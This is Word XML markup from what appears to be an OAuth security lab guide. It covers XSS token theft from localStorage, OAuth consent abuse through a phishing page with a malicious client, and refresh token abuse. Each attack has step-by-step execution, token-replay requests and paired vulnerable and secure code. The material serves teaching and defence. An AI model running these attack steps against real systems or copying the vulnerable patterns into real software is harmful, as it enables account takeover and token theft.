              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — SHA256 challenge verified</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const expected = crypto.createHash('sha256').update(code_verifier).digest('base64url');</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if (authCode.code_challenge !== expected) {</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return res.status(400).json({ error: 'invalid_grant' });</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4"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12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 3  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Token Leakage via XSS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: HIGH  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: client-app/src/server.js  |  VULNERABLE: token stored in localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens in localStorage are accessible to all JavaScript on the page origin, including injected malicious scripts. An XSS payload — injected via a comment field, URL parameter, or stored content — can silently exfiltrate the token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in at YOUR_DOMAIN:3002 and complete the OAuth flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open DevTools → Application → Local Storage → YOUR_DOMAIN:3002. The full JWT is visible in plain text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit YOUR_DOMAIN:3002/xss-demo — the simulated XSS payload fires automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open YOUR_DOMAIN:3004/dashboard — the stolen token appears in the Captured Tokens table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the stolen token:</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YOUR_DOMAIN:3003/api/profile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-H "Authorization: Bearer STOLEN_TOKEN"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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — token accessible via JavaScript</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localStorage.setItem('access_token', accessToken);</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Any JS on the page can read: localStorage.getItem('access_token')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — HttpOnly cookie, invisible to JavaScript</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res.cookie('access_token', token, {</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httpOnly: true,     // document.cookie excludes this</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sameSite: 'Strict',</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secure: true,       // HTTPS only in production</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4"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12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 4  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">OAuth Consent Abuse</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: HIGH  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: auth-server/src/routes/auth.js  |  VULNERABLE: no admin approval gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A malicious OAuth client registered with admin scope can request those scopes via a phishing page. In vulnerable mode, there is no gate stopping an untrusted client from obtaining admin consent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit the phishing page: YOUR_DOMAIN:3004/phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Click Allow Access on the page — this triggers a real OAuth flow using malicious-client with admin scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in as alice / password123 and approve on the auth server consent screen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check YOUR_DOMAIN:3004/dashboard — the authorization code is captured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exchange the code using the malicious client credentials:</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-X POST YOUR_DOMAIN:3001/oauth/token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"grant_type=authorization_code"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"code=CAPTURED_CODE"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"redirect_uri=YOUR_DOMAIN:3004/capture"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"client_id=malicious-client"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"client_secret=evil-secret-666"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the obtained admin token to call the admin API:</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YOUR_DOMAIN:3003/api/admin/users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-H "Authorization: Bearer ACCESS_TOKEN"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8"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F6FEB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🔧 Phishing Page Fixed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The Allow Access and Cancel buttons on the phishing page now correctly redirect to the auth server and back to the client app respectively. If you see the popup but nothing happens, ensure the auth server (YOUR_DOMAIN:3001) is reachable.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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — event logged but not blocked</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logAuditEvent({ event_type: 'PRIVILEGED_SCOPE_REQUEST' });</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Falls through — consent screen still shown to user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — untrusted clients blocked from admin scopes</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if (hasPrivilegedScope &amp;&amp; !client.trusted) {</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return res.status(403).json({ error: 'admin_approval_required' });</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4"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2A2A" w:sz="12"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 5  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Refresh Token Abuse</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: CRITICAL  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: auth-server/src/routes/token.js  |  VULNERABLE: non-rotating, 10-year TTL tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh tokens that never expire and never rotate give an attacker who steals one unlimited, permanent access to a user's account — even after the user changes their password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in at YOUR_DOMAIN:3002. Open DevTools → Application → Local Storage. Copy the refresh_token value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
